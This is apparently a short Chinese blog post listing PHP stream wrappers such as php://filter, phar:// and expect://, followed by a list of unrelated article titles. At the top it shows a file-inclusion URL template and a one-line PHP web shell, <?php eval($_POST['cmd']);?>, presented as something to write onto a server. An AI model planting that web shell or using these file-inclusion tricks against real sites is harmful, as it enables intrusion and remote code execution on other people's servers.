php伪协议介绍

    file:// — 访问本地文件系统
    http:// — 访问 HTTP(s) 网址
    ftp:// — 访问 FTP(s) URLs
    php:// — 访问各个输入/输出流（I/O streams）
    php://stdin, php://stdout 和 php://stderr
    php://input
    php://output
    php://memory 和 php://temp
    php://filter
    zlib:// — 压缩流
    data:// — 数据（RFC 2397）
    glob:// — 查找匹配的文件路径模式
    phar:// — PHP 归档
    ssh2:// — Secure Shell 2
    rar:// — RAR
    ogg:// — 音频流
    expect:// — 处理交互式的流

www.xxx.com?cmd.php=file://[文件的绝对路径和文件名]

# 下面读取用的一些比如convert.base64、convert.iconv.UTF-8.UTF-7写入也可以用

## 写入一句话木马<?php eval($_POST['cmd']);?>

相关文章：

第 13 章 -Go 语言 接口

C#语言详解：从基础到进阶

基于java的航空机票预定管理系统

React中 修改 html字符串 中某些元素的属性

【IC每日一题：IC常用模块--RR/handshake/gray2bin】

设计模式之装饰器模式(SSO单点登录功能扩展，增加拦截用户访问方法范围场景)

树莓派开发相关知识十 -小试服务器

智能电网能源优化管理系统（Smart Grid Energy Optimization Management System, SGEOMS）

jupyter notebook启动和单元格cell

java ssm 网上蛋糕店 在线蛋糕甜品管理 网上蛋糕管理 源码 jsp

MySQL的约束和三大范式

C# NUnit 框架：高效使用指南

Spring Boot 集成JWT实现Token验证详解

clickhouse 安装配置

react动态路由

【重装系统后重新配置2】pycharm 终端无法激活conda环境

ORACLE的完全检查点和增量检查点

FPGA实现串口升级及MultiBoot（六)ICAPE2原语实例讲解

计算机网络 TCP/IP体系 数据链路层

qt QLocale详解

陀螺仪BMI323驱动开发测试（基于HAL库SPI通信）

大数据-213 数据挖掘 机器学习理论 - KMeans Python 实现 距离计算函数 质心函数 聚类函数

Python使用PDF相关组件案例详解

从截图到代码：screenshot-to-code开源项目实践指南

内网项目，maven本地仓库离线打包，解决Cannot access central in offline mode?

spring boot 统一异常处理